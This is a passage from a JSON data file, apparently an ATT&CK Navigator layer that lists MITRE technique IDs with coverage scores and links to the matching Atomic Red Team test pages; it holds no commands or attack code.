Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View 